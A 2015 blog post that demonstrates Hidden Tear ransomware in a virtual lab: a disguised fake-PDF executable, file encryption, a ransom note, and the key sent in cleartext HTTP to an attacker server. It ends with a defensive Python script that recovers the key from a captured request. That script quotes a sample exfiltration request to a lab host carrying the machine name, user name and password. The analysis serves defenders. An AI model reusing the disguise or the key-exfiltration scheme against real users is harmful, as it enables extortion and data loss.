Thursday 20 August 2015

Hidden Tear - Script Kiddies Ransomware Demo

File-encrypting ransomware (CryptoLocker being the best-known example) is common: the victim's files are encrypted, and the attackers demand a ransom in exchange for the key to decrypt the locked files. According to The Hacker News (http://thehackernews.com/2015/08/ransomware-creator-toolkit.html), script kiddies can now also get the source code (the Hidden Tear project) and build the ransomware themselves.

Today I got the source and played script kiddie, testing it in my virtual environment. REMEMBER: only test within your own environment, never on your host machine or other computers, in case the program crashes and you lose the key :o)....

1.) The victim, on Windows 7 x64, browsed a fake Google website and found a free PDF, haha (in reality people get ransomware elsewhere: hacked websites or some other way ;)...)


2.) The victim downloaded the so-called PDF file (actually an .exe with a PDF icon; for testing purposes, all antivirus and warnings were turned off)


3.) On his desktop there were some important files


4.) The victim tried to open the PDF file, and nothing happened... except that the text files on the desktop were given a new extension, "*.locked", and their content was gone, oh dear... :(



5.) Wait, there's a file called "Read_IT.txt"... and the evil one was asking for a "ransom"...



6.) OK, OK... the victim surrendered and "paid" the ransom, and the evil one kept the promise and gave him the decrypter and the key (not sure that happens in reality)...



And yeah baby, the files were back to normal!



=========================================================

OK, the above demonstrates how the ransomware locks the files and how they "could be" decrypted afterwards. Let's analyze some of the source code, behavior and traffic.

For the source code, you can get it from GitHub. The sample is simply a .NET program; I changed the parameters and compiled it again. Per the README, you change the location of the evil server so that the encryption key is sent to it; the blackmail message can be configured as well. For testing, HTTP was used, not HTTPS.



The password is created randomly and is used to encrypt the files.


The decrypter just takes the key as input and decrypts the files.


For the evil server I used Kali Linux (any web server will do); the server-side script writes the key to a text file. The machine name, user name and key were saved. The key was randomly created.



For traffic, we can take a look at the pcap: the key is sent back to the evil server in the clear. Of course in a real case it may be HTTPS, so we would have less information for analysis.
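Because the key leaves the victim over plain HTTP, a defender holding the capture can recover it without paying, which is the practical point of the source-code and pcap paragraphs above. The script below is an added example for this post, not code from the Hidden Tear project: it parses a captured exfiltration request and pulls out the machine name, user name and password, and then checks a directory for the two on-disk artifacts the demo shows (files renamed to "*.locked" and the "Read_IT.txt" note). The request format ("?info=<machine>-<user> <password>") is assumed to match what the pcap shows; the parameter name, host and the sample request and files are constructed for the example.

```python
"""Recover a Hidden Tear-style key from cleartext HTTP and spot its artifacts.

Added example; not code from the Hidden Tear project. The "?info=" parameter
and the "<machine>-<user> <password>" layout are assumptions about the
exfiltration request; the sample request and demo files are constructed.
"""
import os
import tempfile
from urllib.parse import parse_qs, urlsplit

# Constructed sample: what the victim VM sends to the "evil server" over
# plain HTTP. No TLS, so the password is readable straight from the capture.
SAMPLE_REQUEST = (
    b"GET /hidden-tear/write.php?info=VICTIM-PC-bob%20p4ssw0rd1234567 HTTP/1.1\r\n"
    b"Host: 192.168.56.101\r\n"
    b"User-Agent: Mozilla/4.0\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
)


def extract_exfil_info(raw_http: bytes, param: str = "info"):
    """Parse one raw HTTP request; return {machine, user, password} or None."""
    try:
        request_line = raw_http.split(b"\r\n", 1)[0].decode("ascii")
        method, target, _version = request_line.split(" ", 2)
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed request line
    if method != "GET":
        return None
    values = parse_qs(urlsplit(target).query).get(param)
    if not values:
        return None
    # Assumed layout: "<COMPUTERNAME>-<USERNAME> <password>". The password is
    # the last space-separated token; Windows machine names often contain a
    # dash (e.g. VICTIM-PC), so the user is taken as the part after the last
    # dash (a user name containing a dash would be misparsed).
    ident, sep, password = values[0].rpartition(" ")
    if not sep or not password:
        return None
    machine, dash, user = ident.rpartition("-")
    if not dash:
        return None
    return {"machine": machine, "user": user, "password": password}


def find_ransomware_artifacts(directory, ext=".locked", note_name="Read_IT.txt"):
    """Walk a directory; return (sorted relative paths ending in ext, note present?)."""
    locked, note_found = [], False
    for root, _dirs, files in os.walk(directory):
        for name in files:
            rel = os.path.relpath(os.path.join(root, name), directory)
            if name.lower().endswith(ext.lower()):
                locked.append(rel)
            elif name.lower() == note_name.lower():
                note_found = True
    return sorted(locked), note_found


def build_demo_dir():
    """Constructed victim 'desktop': two encrypted files, one untouched, plus the note."""
    d = tempfile.mkdtemp(prefix="hiddentear-demo-")
    for name in ("notes.txt.locked", "budget.xlsx.locked", "photo.png"):
        with open(os.path.join(d, name), "wb") as f:
            f.write(os.urandom(32))  # stand-in for ciphertext / untouched data
    with open(os.path.join(d, "Read_IT.txt"), "w") as f:
        f.write("Files have been encrypted. Pay to get the key.\n")  # constructed note
    return d


if __name__ == "__main__":
    print("exfiltrated from capture:", extract_exfil_info(SAMPLE_REQUEST))
    demo = build_demo_dir()
    locked, note = find_ransomware_artifacts(demo)
    print("locked files:", locked, "| ransom note present:", note)
```

Run against a real capture, feed each reassembled HTTP request (for example exported from Wireshark's "Follow TCP Stream") to extract_exfil_info; the recovered password is what the decrypter asks for. Over HTTPS the same request is opaque on the wire, which is why the post notes that a real sample would give the analyst far less to work with.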



After that analysis, how about anti-virus detection? Normally when you download an executable, the browser warns you and asks whether to keep or discard it, and when you execute it the system may ask whether you really want to run it. Of course it's another story if the file was dropped by other means, like a browser exploit.


Also, in the VM the file was actually detected by the scanner. hidden-tear.exe was also submitted to VirusTotal, where it is detected as CryptoLocker. (https://www.virustotal.com/en/file/ad2cfd31e5220eaf3ca8bcab5b963505f203b96fa31a8002312ecc45708a3c41/analysis/1440052245/)



That's all for today; the demo is complete. Good luck, and may you not suffer CryptoLocker anymore, my friends :)
